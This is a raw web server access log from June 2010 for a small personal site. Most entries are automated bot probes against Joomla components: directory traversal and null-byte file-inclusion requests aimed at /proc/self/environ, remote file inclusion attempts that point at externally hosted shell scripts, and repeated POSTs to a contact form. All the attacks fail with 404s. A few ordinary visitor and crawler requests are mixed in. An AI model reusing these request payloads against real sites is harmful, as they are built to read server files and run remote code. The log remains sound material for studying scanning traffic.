95.156.233.139 - - [27/Jun/2010:23:47:15 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:47:16 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:47:16 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:47:17 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:47:44 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:47:44 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:47:44 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.121.67.226 - - [27/Jun/2010:23:47:57 -0500] "GET /logs/access_log.1276819200//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:47:58 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:47:58 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
95.156.233.139 - - [27/Jun/2010:23:48:32 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:48:32 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:23:48:33 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.121.67.226 - - [27/Jun/2010:23:48:34 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:34 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:35 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:44 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:44 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:52 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:54 -0500] "GET /logs/access_log.1276819200//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:54 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:54 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:54 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.67.226 - - [27/Jun/2010:23:48:56 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
83.103.72.131 - - [27/Jun/2010:23:49:12 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:23:49:13 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:23:49:13 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
195.189.90.40 - - [27/Jun/2010:23:49:32 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
195.189.90.40 - - [27/Jun/2010:23:49:32 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
195.189.90.40 - - [27/Jun/2010:23:49:33 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
195.189.90.40 - - [27/Jun/2010:23:49:49 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
195.189.90.40 - - [27/Jun/2010:23:49:49 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
195.189.90.40 - - [27/Jun/2010:23:49:49 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
94.23.1.84 - - [27/Jun/2010:23:50:49 -0500] "GET /logs/access_log.1276819200//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:50:49 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:50:50 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:50:54 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:50:54 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:50:54 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:07 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:07 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:07 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:08 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:08 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:08 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:20 -0500] "GET /logs/access_log.1276473600//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:29 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:29 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:29 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:34 -0500] "GET /logs/access_log.1276819200//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
79.174.72.200 - - [27/Jun/2010:23:51:35 -0500] "GET /logs/access_log.1276128000/index_principal.php?pagina=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:23:51:35 -0500] "GET /logs/access_log.1276128000/index_principal.php?pagina=http://yeshouse.net/my/.injek/anak.txt?????? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:23:51:36 -0500] "GET /index_principal.php?pagina=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:23:51:36 -0500] "GET /index_principal.php?pagina=http://yeshouse.net/my/.injek/anak.txt?????? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:23:51:36 -0500] "GET /logs/index_principal.php?pagina=http://warnetanggrek.com/gambar/sh.pdf?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
79.174.72.200 - - [27/Jun/2010:23:51:37 -0500] "GET /logs/index_principal.php?pagina=http://yeshouse.net/my/.injek/anak.txt?????? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
67.228.85.91 - - [27/Jun/2010:23:51:38 -0500] "GET /logs/access_log.1276819200//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:51:38 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:51:38 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
94.23.1.84 - - [27/Jun/2010:23:51:42 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:44 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:44 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:45 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.228.85.91 - - [27/Jun/2010:23:51:51 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
94.23.1.84 - - [27/Jun/2010:23:51:52 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:51:52 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.228.85.91 - - [27/Jun/2010:23:51:54 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:51:58 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:51:58 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:51:58 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:52:00 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
94.23.1.84 - - [27/Jun/2010:23:52:44 -0500] "GET /logs/access_log.1276732800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:53:19 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:53:20 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.1.84 - - [27/Jun/2010:23:53:20 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
67.228.85.91 - - [27/Jun/2010:23:53:29 -0500] "GET /logs/access_log.1276732800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:54:28 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:54:28 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
67.228.85.91 - - [27/Jun/2010:23:54:28 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
59.178.137.203 - - [27/Jun/2010:23:55:02 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.google.co.in/url?sa=t&source=web&cd=2&ved=0CBwQFjAB&url=http%3A%2F%2Ftomdolan.pconline.com%2Fcostume%2F&rct=j&q=costumes+all+nations&ei=FCsoTPzWNYiErAe-n_GRBQ&usg=AFQjCNGvWWBoGeR3Z5unMvDC5CAeWhnm0A""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:06 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:06 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:07 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:08 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:10 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
59.178.137.203 - - [27/Jun/2010:23:55:31 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
208.101.61.52 - - [27/Jun/2010:23:59:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:18 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:19 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:19 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:19 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [27/Jun/2010:23:59:19 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.171.37.206 - - [28/Jun/2010:00:00:13 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:00:00:13 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
213.171.37.206 - - [28/Jun/2010:00:00:14 -0500] "GET /logs/access_log.1276473600//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.808"
207.46.199.240 - - [28/Jun/2010:00:01:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.240 - - [28/Jun/2010:00:01:45 -0500] "GET /artwork/temptation1.jpg HTTP/1.1" 200 65929 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
208.101.61.52 - - [28/Jun/2010:00:04:38 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:38 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
208.101.61.52 - - [28/Jun/2010:00:04:39 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
216.180.240.110 - - [28/Jun/2010:00:05:21 -0500] "GET //main.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:00:05:24 -0500] "GET //main.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
